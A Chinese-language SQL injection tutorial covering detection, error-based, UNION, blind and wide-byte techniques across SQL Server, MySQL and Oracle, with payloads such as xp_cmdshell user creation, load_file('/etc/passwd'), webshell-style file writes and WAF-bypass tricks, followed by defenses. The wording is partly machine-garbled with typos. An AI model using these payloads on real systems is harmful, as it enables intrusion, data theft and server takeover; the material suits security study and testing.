1. 数字型注入
当输入的参数为整型时,则有可能存在数字型注入漏洞。
假设存在一条 URL 为:HTTP://www.aaa.com/test.php?id=1
可以对后台的 SQL 语句预测为:
SELECT FROM table WHERE id=1
判断数字型漏洞的 SQL 注入点:
① 先在输入框中输入一个单引号 '
这样的 SQL 语句就会变为:
SELECT FROM table WHERE id=1',
不符合语法,以是该语句肯定会出错,导致脚本程序无法从数据库获取数据,从而使原来的页面涌现非常。
② 在输入框中输入 and 1 = 1
SQL语句变为:
SELECT FROM table WHERE id=1 and 1 = 1
语句精确,实行正常,返回的数据与原始要求无任何差异。
③ 在数据库中输入 and 1 = 2
SQL 语句变为:
SELECT FROM table WHERE id=1 and 1 = 2
虽然语法精确,语句实行正常,但是逻辑缺点,由于 1 = 2 为永假,以是返回数据与原始要求有差异。
如果以上三个步骤全部知足,则程序就可能存在数字型 SQL 注入漏洞。
2. 字符型注入
当输入参数为字符串时,则可能存在字符型注入漏洞。数字型与字符型注入最大的差异在于:数字型不须要单引号闭合,而字符型一样平常须要利用单引号来闭合。
字符型注入最关键的是如何闭合 SQL 语句以及注释多余的代码。
假设后台的 SQL 语句如下:
SELECT FROM table WHERE username = 'admin'
判断字符型漏洞的 SQL 注入点:
① 还是先输入单引号 admin' 来测试
这样的 SQL 语句就会变为:
SELECT FROM table WHERE username = 'admin''。
页面非常。
② 输入:admin' and 1 = 1 --
把稳:在 admin 后有一个单引号 ',用于字符串闭合,末了还有一个注释符 --(两条杠后面还有一个空格!
!
!
)。
SQL 语句变为:
SELECT FROM table WHERE username = 'admin' and 1 = 1 --
页面显示精确。
③ 输入:admin' and 1 = 2 --
SQL 语句变为:
SELECT FROM table WHERE username = 'admin' and 1 = 2 --
页面缺点。
知足上面三个步骤则有可能存在字符型 SQL 注入。
3. 其他类型
实在我以为 SQL 注入只有两种类型:数字型与字符型。很多人可能会说还有如:Cookie 注入、POST 注入、延时注入等。
的确如此,但这些类型的注入归根结底也是数字型和字符型注入的不同展现形式或者注入的位置不同罢了。
以下是一些常见的注入叫法:
POST注入:注入字段在 POST 数据中
Cookie注入:注入字段在 Cookie 数据中
延时注入:利用数据库延时特性注入
搜索注入:注入处为搜索的地方
base64注入:注入字符串须要经由 base64 加密
常见数据库的注入
攻击者对付数据库注入,无非是利用数据库获取更多的数据或者更大的权限,利用的办法可以归结为以下几类:
查询数据
读写文件
实行命令
攻击者对付程序注入,无论任何数据库,无非都是在做这三件事,只不过不同的数据库注入的 SQL 语句不一样罢了。
这里先容三种数据库的注入:Oracle 11g、MySQL 5.1 和 SQL Server 2008。
SQL Server
1. 利用缺点提取信息
SQL Server 数据库是一个非常精良的数据库,它可以准确地定位缺点信息,这对攻击者来说是一件十分美好的事情,由于攻击者可以通过缺点提取自己想要的数据。
① 列举当前表或者列
假设选择存在这样一张表:
查询 root 用户的详细信息,SQL 语句预测如下:
SELECT FROM user WHERE username = 'root' AND password = 'root'
攻击者可以利用 SQL Server 特性来获取敏感信息,在输入框中输入如下语句:
' having 1 = 1 --
终极实行的 SQL 语句就会变为:
SELECT FROM user WHERE username = 'root' AND password = 'root' HAVING 1 = 1 --
那么 SQL 的实行器可能会抛出一个缺点:
攻击者就可以创造当前的表名为 user、而且存在字段 id。
攻击者可以利用此特性连续得到其他列名,输入如下语句:
' GROUP BY users.id HAVING 1 = 1 --
则 SQL 语句变为:
SELECT FROM user WHERE username = 'root' AND password = 'root' GROUP BY users.id HAVING 1 = 1 --
抛出错误:
由此可以看到包含列名 username。可以一次递归查询,知道没有缺点返回位置,这样就可以利用 HAVING 字句得到当表的所有列名。
注:Select指定的每一列都该当涌如今Group By子句中,除非对这一列利用了聚合函数
②. 利用数据类型缺点提取数据
如果试图将一个字符串与非字符串比较,或者将一个字符串转换为另一个不兼容的类型,那么SQL 编辑器将会抛出非常。
如下列 SQL 语句:
SELECT FROM user WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users)
实行器缺点提示:
这就可以获取到用户的用户名为 root。由于在子查询 SELECT TOP 1 username FROM users 中,将查询到的用户名的第一个返回,返回类型是 varchar 类型,然后要跟 int 类型的 1 比较,两种类型不同的数据无法比较而报错,从而导致了数据透露。
利用此方法可以递归推导出所有的账户信息:
SELECT FROM users WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users WHERE not in ('root'))。
通过布局此语句就可以得到下一个 用户名;若把子查询中的 username 换成其他列名,则可以获取其他列的信息,这里就不再赘述。
2. 获取元数据
SQL Server 供应了大量视图,便于取得元数据。可以先预测出表的列数,然后用 UNION 来布局 SQL 语句获取个中的数据。
如:
SELECT FROM WHERE id = UNION SELECT 1, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
若当前表的列数为 2,则可以 UNION 语句获取当前数据库表。详细怎么预测当前表的列数,后面进行描述。
一些常用的系统数据库视图:
数据库视图 解释
SYS.DATABASES SQL Server 中的所有数据库
SYS.SQL_LOGINS SQL Server 中的所有登录名
INFORMATION_SCHEMA.TABLES 当前用户数据库中的所有数据表
INFORMATION_SCHEMA.COLUMNS 当前用户数据库中的所有列
SYS.ALL_COLUMNS 用户定义工具和系统工具的所有列的联合
SYS.DATABASE_PRINCIPALS 数据库中每个权限或列非常权限
SYS.DATABASE_FILES 存储在数据库中的数据库文件
SYSOBJECTS 数据库中创建的每个工具 (包括约束、日志以及存储过程)
3. ORDER BY 子句预测列数
可以用 ORDER BY 语句来判断当前表的列数。
如:
① SELECT FROM users WHERE id = 1——SQL实行正常
②SELECT FROM users WHERE id = 1 ORDER BY 1 (按照第一列排序)——SQL实行正常
③ SELECT FROM users WHERE id = 1 ORDER BY 2 (按照第二列排序)——SQL实行正常
④ SELECT FROM users WHERE id = 1 ORDER BY 3 (按照第三列排序)——SQL 实行正常
⑤ SELECT FROM users WHERE id = 1 ORDER BY 4 (按照第四列排序)——SQL 抛出非常:
由此可以得出,当前表的列数只有 3 列,由于当按照第 4 列排序时报错了。在 Oracle 和 MySql 数据库中同样适用此方法。
在得知列数后,攻击者常日汇合营 UNION 关键字进行下一步的攻击。
4. UNION 查询
UNION 关键字将两个或多个查询结果组合为单个结果集,大部分数据库都支持 UNION 查询。但适用 UNION 合并两个结果有如下基本规则:
所有查询中的列数必须相同
数据类型必须兼容
① 用 UNION 查询预测列数
不仅可以用 ORDER BY 方法来预测列数,UNION 方法同样可以。
在之前假设的 user 表中有 5 列,若我们用 UNION 联合查询:
SELECT FROM users WHERE id = 1 UNION SELECT 1
数据库会发出非常:
可以通过递归查询,直到无缺点产生,就可以得知 User 表的查询字段数:
UNION SELECT 1,2、UNION SELECT 1,2,3
也可以将 SELECT 后面的数字改为 null、这样不随意马虎涌现不兼容的非常。
② 联合查询敏感信息
在得知列数为 4后,可以利用一下语句连续注入:
UNION SELECT 'x', null, null, null FROM SYSOBJECT WHERE xtype='U' (注:xtype=‘U’ 表示工具类型是表)
若第一列的数据类型不匹配,数据库会报错,那么可以递归查询,直到语句兼容。等到语句正常实行,就可以将 x 换为 SQL 语句,查询敏感信息。
5. 利用SQL Server 供应的系统函数
SQL Server 供应了非常多的系统函数,利用该系统函数可以访问 SQL Server 系统表中的信息,而无需利用 SQL 查询语句。
如:
SELECT suser_name():返回用户的登录标识名
SELECT user_name():基于指定的标识号返回数据库用户名
SELECT db_name():返回数据库名
SELECT is_member(‘db_owner’):是否为数据库角色
SELECT convert(int, ‘5’):数据类型转换
6. 存储过程
存储过程 (Stored Procedure) 是在大型数据库系统中为了完成特定功能的一组 SQL “函数”,如:实行系统命令、查看注册表、读取磁盘目录等。
攻击者最长利用的存储过程是 “xp_cmdshell”,这个存储过程许可用户实行操作系统命令。
例如:http://www.aaa.org/test.aspx?id=1 中存在注入点,那么攻击者就可以履行命令攻击:
http://www.aaa.org/test.aspx?id=1;exec xp_cmdshell 'net user test test /add'
终极实行的 SQL 语句如下:
SELECT FROM table WHERE id=1; exec xp_cmdshell 'net user test test /add'
分号后面的那一段语句就可以为攻击者在对方做事器上新建一个用户名为 test、密码为 test 的用户。
注:并不是任何数据库用户都可以利用此类存储过程,用户必须持有 CONTROL SERVER 权限。
常见的危险存储过程如下表:
存储过程 解释
sp_addlogin 创建新的 SQL Server 登录,该登录许可用户利用 SQL Server 身份连接到 SQL Server 实例
sp_dropuser 从当前数据库中删除数据库用户
xp_enumgroups 供应 Microsoft Windows 本地组列表或在指定的 Windows 域中定义全局组列表
xp_regread 读取注册表
xp_regwrite 写入注册表
xp_redeletevalue 删除注册表
xp_dirtree 读取目录
sp_password 变动密码
xp_servicecontrol 停滞或激活某做事
其余,任何数据库在利用一些分外的函数或存储过程时,都须要特定的权限。常见的SQL Server 数据库的角色与权限如下:
角色 权限
bulkadmin 可以运行 BULK INSERT 语句
dbcreator 可以创建、变动、删除和还原任何数据库
diskadmin 可以管理磁盘文件
processadmin 可以栽种在数据库引擎中运行的实例
securityadmin 可以管理登录名及其属性;可以利用 GRANT、DENY 和 REVOKE 做事器级别的权限;还可以利用 GRANT、DENY 和 REVOKE 数据库级别的权限;此外也可以重置 SQL Server 登录名的密码
serveradmin 可以变动做事器范围的配置选项和关闭做事器
setupadmin 可以添加和删除链接手事器,并可以实行某些系统存储过程
sysadmin 可以在数据库引擎中实行任何活动
7. 动态实行
SQL Server 支持动态实行语句,用户可以提交一个字符串来实行 SQL 语句。
如:exec('SELECT username, password FROM users')
也可以通过定义十六进制的 SQL 语句,利用 exec 函数实行。大部分 Web 运用程序和防火墙都过滤了单引号,利用 exec 实行十六进制 SQL 语句可以打破很多防火墙及防注入程序,如:
declare @query varchar(888)
select @query=0x73656C6563742031
exec(@query)123
或者:
declare//@query//varchar(888)//select//@query=0x73656C6563742031//exec(@query)
MySQL
前面详细讲述了 SQL Server 的注入过程,在注入其他数据库时,基本思路是相同的,只不过两者利用的函数或者是语句稍有差异。
1. MySQL 中的注释
MySQL 支持以下 3 中注释风
“#”: 注释从 “#” 到行尾
"-- " :注释从 “-- ”序列到行位,须要把稳的是利用此注释时,后面须要跟上空格
//:注释从 / 到 / 之间的字符
2. 获取元数据
MySQL 5.0 及其以上版本供应了 INFORMATION_SCHEMA,这是一个信息数据库,它供应了访问数据库元数据的办法。下面先容如何从中读取数据库名称、表名称以及列名称。
① 查询用户数据库名称
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA
INFORMATION_SCHEMA.SCHEMATA 表供应了关于数据库的信息。
②查询当前数据表
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = (SELECT DATABASE())
INFORMATION_SCHEMA.TABLES 表给出了数据库中表的信息。
③查询指定表的所有字段
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = ''
INFORMATION_SCHEMA.COLUMNS 表中给出了表中的列信息。
3. UNION 查询
与 SQL Server 大致相同,此处不赘述。
4. MySQL 函数利用
无论是 MySQL、Oracle 还是其他数据库都内置了许多系统函数,这些数据库函数都非常类似,接下来先容一些对渗透测试职员很有帮助的 MySQL 函数。
① load_file() 函数读文件操作
MySQL 供应了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在做事器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)。
SQL 语句如下:
UNION SELECT 1, load_file('/etc/passwd'), 3, 4
常日一些防注入语句不许可单引号涌现,那么可以利用一下语句绕过:
UNION SELECT 1, load_file(0x2F6561342F706173737764), 3, 4 #
“0x2F6561342F706173737764” 为 “/etc/passwd” 的十六进制转换结果。
在浏览器返回数据时,有可能存在乱码问题,那么可以利用 hex() 函数将字符串转换为十六进制数据。
② into outfile 写文件操作
MySQL 供应了向磁盘写文件的操作,与 load_file() 一样,必须有 FILE 权限,并且文件必须为全路径名称。
写入文件:
SELECT '<?php phpinfo();?>' into oufile 'C:\wwwroot\1.php'
③ 连接字符串
MySQL 如果须要一次查询多个数据,可以利用 concat() 或 concat_ws() 函数来完成。
SELECT name FROM student WHERE id = 1 UNION SELECT concat(user(), ',', database(), ',', version())
也可以将逗号改用十六进制表示:0x2c
5. MySQL 显错式注入
MySQL 也存在显错式注入,可以像 SQL Server 数据库那样,利用缺点提取消息。
① 通过 updatexml 函数实行 SQL 语
首先理解下updatexml()函数:
updatexml (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档工具的名称;
第二个参数:XPath_string (Xpath格式的字符串) ,
第三个参数:new_value,String格式,更换查找到的符合条件的数据
SELECT FROM message WHERE id = 1 and updatexml(1, (concat(0x7c, (SELECT @@version))), 1)
个中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而涌现格式缺点,报错,会显示出无法识别的内容:
② 通过 extractvalue函数
SEELCT FROM message WHERE id= 1 AND extravtvalue(1, concat(0x7c, (SELECT user())))
同样报错显示出当前用户:
6. 宽字节注入
宽字节注入是由编码分歧一所造成的,这种注入一样平常涌如今 PHP + MySQL中。
在 PHP 配置文件 php.ini 中存在 magic_quotes_gpc 选项,被称为魔术引号,当此选项被打开时,利用 GET、POST、Cookie 所接管的 单引号(’)、双引号(")、反斜线() 和 NULL 字符都会自动加上一个反斜线转义。
如下利用 PHP 代码利用 $_GET 吸收参数:
如访问URL:http:/www.xxser.com/Get.php?id=',显示如下:
单引号'被转义后就变成了\',在 MySQL 中,\'是一个合法的字符,也就没办法闭合单引号,以是,注入类型是字符型时无法构成注入。
但是若是输入:%d5',访问URL:http:/www.xxser.com/Get.php?id=%d5',显示如下:
可以创造,这次单引号没有被转义,这样就可以打破 PHP 转义,连续闭合 SQL 语句进行 SQL 注入。
7. MySQL 长字符截断
MySQL 超长字符截断别号 “SQL-Column-Truncation”。
在 MySQL 中的一个设置里有一个 sql_mode 选项,当 sql_mode 设置为 default 时,即没有开启 STRICT——ALL_TABLES 选项时,MySQL 对插入超长的值只会提示 waring,而不是 error。
假设有一张表如下:
username 字段的长度为 7。
分别插入一下 SQL 语句:
① 插入正常 SQL 语句:
INSERT users(id, username, password) VALUES(1, 'admin', 'admin');
成功插入。
② 插入缺点的 SQL 语句,使 username 字段的长度超过7:
INSERT users(id, username, password) VALUES(2, 'admin ', 'admin');
虽然有警告,但是成功插入了。
③ 再考试测验插入一条缺点的 SQL 语句,长度同一超过原有的规定长度:
INSERT users(id, username, password) VALUES(3, 'admin x), 'admin;
查询数据库
可以看到,三条数据都被插入到数据库中,但是值发生了变革。在默认情形下,如果数据超出默认长度,MySQL 会将其阶段。
但是这样怎么攻击呢?通过查询用户名为 admin 的用户:
可以创造,只查询用户名为 admin 的用户,但是其余两个长度不一致的 admin 用户也被查询出,这样就会造成一些安全问题。
比如有一处管理员登录时这样判断的:
$sql = "SELECT count() FROM users WHERE username = 'admin' AND password = ''";
那么攻击者只须要注册一个长度超过规定长度的用户名“admin ”即可轻易进入后台管理页面。
8. 延时注入
延时注入属于盲注技能的一种,是一种基于韶光差异的注入技能。下面以 MySQL 为例先容延时注。
在 MySQL 中有一个函数:sleep(duration),这个函数意思是在 duration 参数给天命秒后运行语句,如下 SQL 语句:
SELECT FROM users WHERE id = 1 AND sleep(3)
便是将在 3 秒后实行该 SQL 语句。
可以利用这个函数来判断 URL 是否存在 SQL 注入漏洞,步骤如下:
通过页面返回的天下可以断定,DBMS 实行了 and sleep(3) 语句,这样一来就可以判断出 URL 存在 SQL 注入漏洞。
然后通过 sleep() 函数还可以读出数据,但须要其他函数的合营,步骤如下:
①查询当前用户,并取得字符串长度
实行SQL 语句:
AND if(length(user()) = 0, sleep(3), 1)
如果涌现 3 秒延时,就可以判断出 user 字符串长度,注入时常日会采取半数算法减少判断。
② 截取字符串第一个字符,并转换为 ASCII 码
AND if(hex(mid(user(), 1, 1)) = 1, sleep(3), 1)
AND if(hex(mid(user(), 1, 1)) = 2, sleep(3), 1)
……
不断改换 ASCII 码直到涌现延时 3 秒就可以预测出第一个字符。
③ 递归截取字符串每一个字符,分别于 ASCII 码比较
AND if(hex(mid(user(), L, 1)) = N, sleep(3), 1)
注:L 的位置代表字符串的第几个字符,N 的位置代表 ASCII 码。
不仅在 MySQL 中存在延时函数,在 SQL Server、Oracle 等数据库中也都存在类似功能的函数,如 SQL Server 的 waitfor delay、Oracle 中的 DBMS_LOCK.SLEEP 等函数。
Oracle
1. 获取元数据
Oracle 也支持查询元数据,下面是 Oracle 注入常用的元数据视图:
① user_tablespaces 视图,查看表空间
SELECT tablespace_name FROM user_tablespaces
② user_tables 视图,查看当前用户的所有表
SELECT table_name FROM user_tables WHERE rownum = 1
③ user_tab_columns 视图,查看当前用户的所有列,如查询 user 表的所有列:
SELECT column_name FROM user_tab_columns WHERE table_name = 'users'
④ all_users 视图,查看 ORacle 数据库的所有用户
SELECT username FROM all_users
⑤ user_objects 视图,查看当前用户的所有工具 (表名称、约束、索引)
SELECT object_name FROM user_objects
2. UNION 查询
Oracle 与 MySQL 一样不支持多语句实行,不像 SQL Server 那样可以用分号隔开从而注入多条 SQL 语句。
①获取列的总数
获取列总数方法与前面两种数据库类似,依然可以利用 ORDER BY 子句来完成。
另一种方法是利用 UNION 关键字来确定,但是 Oracle 规定,每次查询时后面必须跟表的名称,否则查询将不成立。
在 Oracle 中可以利用:
UNION SELECT null, null, null …… FROM dual
这里的 dual 是 Oracle 中的虚拟表,在不知道数据库中存在哪些表的情形下,可以利用此表作为查询表。
然后获取非数字类型列,即可以显示出信息的列:
UNION SELECT 'null', null, null, …… FROM dual
UNION SELECT null, 'null', null, …… FROM dual
把每一位的 null 依次用单引号 ’ 引起来,如果报错,则不是字符串类型的列;如果返回正常,则是字符串类型的列,就可以在相应的位置插入查询语句获取信息。
② 获取敏感信息
常见的敏感信息如下:
当前用户权限:SELECT FROM session_roles
当前数据库版本:SELECT banner FROM sys.v_$version WHERE rownum = 1
做事器出口 IP:用utl_http.request 可以实现
做事器监听 IP:SELECT utl_inaddr.get_host_address FROM dual
做事器操作系统:SELECT member FROM v$logfile WHERE rownum = 1
做事器 SID:SELECT instance_name FROM v$instance
当前连接用户:SELECT SYS_CONTEXT('USERENV', 'CURRENT_USER') FROM dual
③ 获取数据库表及其内容
在得知表的列数之后,可以通过查询元数据的办法查询表名称、列名称,然后查询数据,如:
http://www.aaa.org/new.jsp?id=1 UNION SELECT username, password, null FROM users --
把稳:在查询数据时同样要把稳数据类型,否则无法查询,只能逐一测试,改变参数的查询位置。
sql注入的危害
1、攻击者未经授权可以获取数据库中的数据,造成数据透露;
2、攻击者可以修改数据库内容,比如将部分内容修改为违法内容;
3、攻击者可以对数据库中数据进行操作(增加/删除),比如添加一个后门用户;
4、攻击者乃至可以进行提权,获取做事器管理员权限,安装后门,然后为所欲为;
(1)注入点的不同分类
数字类型的注入字符串类型的注入(2)提交办法的不同分类
GET注入POST注入COOKIE注入HTTP注入(3)获取信息的办法不同分类
基于布尔的盲注基于韶光的盲注基于报错的注入三.SQL注入攻击防御方法
1.定制黑名单:将常用的SQL注入字符写入到黑名单中,然后通过程序对用户提交的POST、GET要求以及要求中的各个字段都进行过滤检讨,筛选威胁字符。
2.限定查询长度:由于SQL注入过程中须要布局较长的SQL语句,因此,一些特定的程序可以利用限定用户提交的要求内容的长度来达到防御SQL注入的目的,但这种效果并不好。
3.限定查询类型:限定用户要求内容中每个字段的类型,并在用户提交要求的时候进行检讨,凡不符合该类型的提交就认为是非法要求。
4.白名单法:该方法只对部分程序有效,对一些要求内容相对固定的程序,可以制订要求内容的白名单,如:某程序接管的要求只有数字,且数字为1至100,这样可以检讨程序接管的要求内容是否匹配,如果不匹配,则认为是非法要求。
5.设置数据库权限:根据程序哀求为特定的表设置特定的权限,如:某段程序对某表只需具备select权限即可,这样纵然程序存在问题,恶意用户也无法对表进行update或insert等写入操作。
限定目录权限:WEB目录应至少遵照“可写目录不可实行,可实行目录不可写”的原则,在次根本上,对各目录进行必要的权限细化。绕过方法大小写 双写绕过 编码 内联注释/!/
添加注释 #、--、-- -、--+、//、/letmetest/、;%00
代替空格 //、()、+、%20、%09、%等0a、0x0a、0x0b、0x0c、0x0d,+、-、~、
编码 Hex编码、URL编码、宽字节、 Un i code编码
等价字符以及等价函数
and or xor 的过滤
1. and => &&
2. or => ||
3. xor => ^
4. not => !
等价函数
hex()、 bin()==>ascii()
concat_ws()==>group_concat()
sleep()==>benchmark()
mid()、substr()==>substring()
@@user==user()
@datadir==datadir()
分外情形
等号被过滤的时候可以利用!<>
利用<>绕过<>等价于 != 以是我们可以在<>前加个!就变成即是了
利用like代替即是
利用通配符like实行的效果和 = 同等
?id=-1 union select from users where id like 2%23
测试方法:
参数后添加 and 1=1 and 1=2 返回数据不同解释存在SQL注入
类型
大略注入:
永真式:末了加入 or 1=1 来担保无论如何都能获取数据。
缺点语句:让Web运用布局缺点的SQL语句来抛非常,来判断数据库类型
结束注释:利用注释符注释剩余语句
联合查询:利用union all,后面可以写我要查询的真正语句
盲注:一样平常可以根据返回数据获取我们想要的信息,但一些页面,我们是获取不到详细信息。信息只有精确或禁绝确
基于布尔的盲注:不返回数据库数据,结果false和true
基于韶光的盲注:利用sleep()或benchmark()等函数让mysql实行韶光变长
if(表达式,true,false);if(length(database()>1,sleep(5),1))
基于报错注入
联合查询注入:id=-1 union select 1,2,3
堆查询注入:引号闭合 %23----#